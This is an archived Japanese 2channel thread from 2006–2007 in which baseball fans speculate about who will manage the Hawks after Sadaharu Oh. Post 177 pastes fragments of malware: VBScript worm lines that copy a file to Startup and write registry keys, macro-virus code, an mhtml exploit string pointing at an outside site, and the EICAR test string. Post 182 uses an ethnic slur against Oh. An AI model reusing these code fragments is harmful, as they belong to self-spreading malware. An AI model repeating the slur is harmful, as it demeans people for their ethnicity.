159 :代打名無し@実況は実況板で:2006/12/28(木) 12:07:04 ID:wbhagkkE0
     / ̄ ̄ ヽ,    ━━┓┃┃
    /        ',       ┃   ━━━━━━━━
    .l  {0} /¨`ヽ}0},       ┃               ┃┃┃
   .l     ヽ._.,,'   ≦ 三                    ┛
   リ    ゝ'゚       ≦ 三 ゚。 ゚
   |    。≧         三 ==-
   |     -ァ,          ≧=- 。
    |      イレ,、         >三  。゚ ・ ゚
        ≦`Vヾ        ヾ ≧
        。゚ /。・イハ 、、     `ミ 。 ゚ 。


160 :代打名無し@実況は実況板で:2006/12/28(木) 12:33:07 ID:Xd7YMY9K0
秋山が成績不振のときは的場が監督やるというのは本当ですか?

161 :代打名無し@実況は実況板で:2006/12/28(木) 15:03:53 ID:Q4csBNMl0
>>160
それは、間違い
臨時監督最有力候補は、鳥越です

162 :代打名無し@実況は実況板で:2006/12/28(木) 17:44:12 ID:bXnox/uV0
>>157
なんか有りそうな予感

163 :代打名無し@実況は実況板で:2006/12/28(木) 19:12:36 ID:mbOlpCoF0
高校時代から同郷の秋山の大ファン
3塁デビュー、レギュラー、タイトル、トレード
ずっと応援してきた。所沢もドームもいった。
いっぱいホームランもみた。

けど、言わせて

秋山アタマ悪りいいい

まったく緊張感のない試合展開の時だけ
ポコンってHR。ドームのスタンドがみんな
「あれ?今なんかボール飛んだ??」
って全然湧かないシーン、何度みたことか。
最高の身体能力にからっぽのアタマ

監督反対、、人柄いいしファンに人気あるから
傷つけたくないよ

164 :代打名無し@実況は実況板で:2006/12/28(木) 20:21:10 ID:b5YDtkAT0
緊張感の無い時だけHRを打つことと頭が悪いことの相関関係が見えない

165 :代打名無し@実況は実況板で:2006/12/29(金) 12:01:44 ID:LX8vAg7u0
>>157
清原より秋山の方が意外と人望なさそう

166 :代打名無し@実況は実況板で:2006/12/29(金) 12:04:57 ID:8LoXaLVj0
監督もだけど、だれがフロントをやってるかが大きい。

167 :代打名無し@実況は実況板で:2006/12/29(金) 12:20:34 ID:JtC5EO9t0
678 名前:名無しサイコーバイ! 投稿日:26/07/05 21:54:38 ID:fzkXu3iU
そろそろ交代か?

679 名前:名無しサイコーバイ! 投稿日:26/07/05 21:54:43 ID:Z5SUZ2gq
監督キタ━━━━━━━(゚∀゚)━━━━━━━!!

680 名前:名無しサイコーバイ! 投稿日:26/07/05 21:54:53 ID:BWgCbMXS
ゴリキタ━━━━━(゚(゚∀(゚∀゚(☆∀☆)゚∀゚)∀゚)゚)━━━━━!!

681 名前:名無しサイコーバイ! 投稿日:26/07/05 21:54:58 ID:AuSKySR9
誰だよ

682 名前:名無しサイコーバイ! 投稿日:26/07/05 21:54:59 ID:OGitZbbY
和田かよ

684 名前:名無しサイコーバイ! 投稿日:26/07/05 21:55:17 ID:0j9z9h5X
ま た 和 田 か

683 名前:名無しサイコーバイ! 投稿日:26/07/05 21:55:05 ID:uHQ9r0I3
和田キタ━━━━━━('A`) ━━━━━━ !!!!!

685 名前:名無しサイコーバイ! 投稿日:26/07/05 21:55:20 ID:1aOcRFQE
もういい加減に引退しろよ

686 名前:名無しサイコーバイ! 投稿日:26/07/05 21:55:35 ID:fzkXu3iU
ゴ リ ラ 采 配 流 石 だ な


168 :代打名無し@実況は実況板で:2006/12/29(金) 21:07:44 ID:efzYQcRr0
>>165
引退の年、福岡ドームでホークスナインに胴上げされ
西武ドームでライオンズナインに胴上げされたんだから人望有るんじゃないの

169 :代打名無し@実況は実況板で:2006/12/29(金) 23:33:39 ID:dd5Owtcd0
初めて優勝したくらいの頃は野手はみんな「秋山さん秋山さん」
投手は「工藤さん工藤さん」だったような。

170 :代打名無し@実況は実況板で:2006/12/30(土) 17:13:52 ID:XH0iIbzh0
現役の時チームリーダーの象徴のように扱われながら
監督になってからは人望さっぱりのポレのような例もあるからなぁ

171 :代打名無し@実況は実況板で:2006/12/30(土) 20:17:14 ID:z9yyIx090
メジャーでコーチしてたアップショーがいつか監督になるのでは

172 :代打名無し@実況は実況板で:2006/12/31(日) 09:04:40 ID:Cpi9cVM90
確かアップショーってダメ外人だったよなw
監督(田淵?)の初期評価は高かったはずだが

173 :代打名無し@実況は実況板で:2006/12/31(日) 17:12:07 ID:Zp3ulwPg0
アップショーは監督の初期評価どうこうより
たしかメジャーでの実績がかつてないほどドえらいものだったはず。
今でいえばA-RODを呼んでくるようなものか?

174 :代打名無し@実況は実況板で:2006/12/31(日) 17:47:58 ID:JindU2F50
アプショーは独立リーグの監督経験者(1998-2000)
采配は知らん


175 :代打名無し@実況は実況板で:2006/12/31(日) 22:04:11 ID:4JCZ+cPnO
井口が女癖が悪いって???

ハァ?あの顔で?

176 :代打名無し@実況は実況板で:2007/01/01(月) 11:55:49 ID:66Za0mnR0
王−秋山−小久保って、全然出所が違うのにピシッとまとまっているのは流石だね。

177 :代打名無し@実況は実況板で:2007/01/01(月) 15:51:02 ID:7pSDPqJG0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ

178 :k:2007/01/02(火) 14:07:09 ID:4TPfjynb0
lklkdasl]]



cvz,v.zxc




afas;\asd/\f



zvxcvzvf



dfsdfsdfsd



xvxcvxcv




sdfsdfsd



cvxcxcxc

179 :代打名無し@実況は実況板で:2007/01/02(火) 21:12:09 ID:2XjG06il0
既定路線か・・・。
ホークスってなんかつまんない球団に成り下がったね

180 :代打名無し@実況は実況板で:2007/01/02(火) 22:48:34 ID:zxZTh6+s0
>>179
オマエも2chのスレタイ見て球団評価する
つまんない奴だなw

181 :代打名無し@実況は実況板で:2007/01/03(水) 01:04:28 ID:Sg7dCESQ0
>>179
いつのホークスと比べてつまんないのか知らんが、藤本とかが主力で
いた頃はプロ球団ではなかったという王の言葉は確かだから、
成り下がってはいないよ。

182 :ワンコ:2007/01/05(金) 19:41:44 ID:e2Z5AHb70
ど腐れチャンコロ
湾口貞治

183 :代打名無し@実況は実況板で:2007/01/09(火) 20:26:42 ID:uQDi2IYu0
普通監督というのは成績不振で辞めるものだが、
王さんの場合、優勝するまで辞めさせてくれない予感

184 :代打名無し@実況は実況板で:2007/01/09(火) 20:45:18 ID:KTRvuUgsO
僅か2年程度で再登板させるしかない、人材不足な虚人よりは良いわな

185 :代打名無し@実況は実況板で:2007/01/09(火) 22:33:35 ID:i6o1KdcG0
昔生卵投げられて早く辞めろとか言われてた時代が懐かしい

186 :代打名無し@実況は実況板で:2007/01/14(日) 14:44:08 ID:TN1dYgl60
>>185

今年優勝しないと復活しそう



187 :代打名無し@実況は実況板で:2007/01/14(日) 15:51:12 ID:d4z747xq0
>>173
さすがにA−RODまではいかんね。
今でいうとバティスタを呼んでくるような感じ。

188 :代打名無し@実況は実況板で:2007/01/17(水) 15:12:40 ID:e6GiLOU+0
的場監督待望論沸騰す

189 :代打名無し@実況は実況板で:2007/01/17(水) 15:26:26 ID:Nr8e25Vw0
阪神の話しようや

190 :代打名無し@実況は実況板で:2007/01/17(水) 15:52:57 ID:6n5E6qbS0
>>157
そしてその頃西武は外人監督なんだな?

191 :代打名無し@実況は実況板で:2007/01/17(水) 19:23:26 ID:1qTmpmJT0
デストラーゼ監督

192 :代打名無し@実況は実況板で:2007/01/17(水) 22:04:15 ID:cD7XdSDN0
ゼ・・・

193 :代打名無し@実況は実況板で:2007/01/17(水) 23:06:32 ID:RiDd/rlb0
アミラーゼ監督

194 :代打名無し@実況は実況板で:2007/01/18(木) 17:49:44 ID:tihH38DQ0


195 :代打名無し@実況は実況板で:2007/01/19(金) 23:12:14 ID:vMP3n2zd0
岡田→木戸→掛布も既定路線

41 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)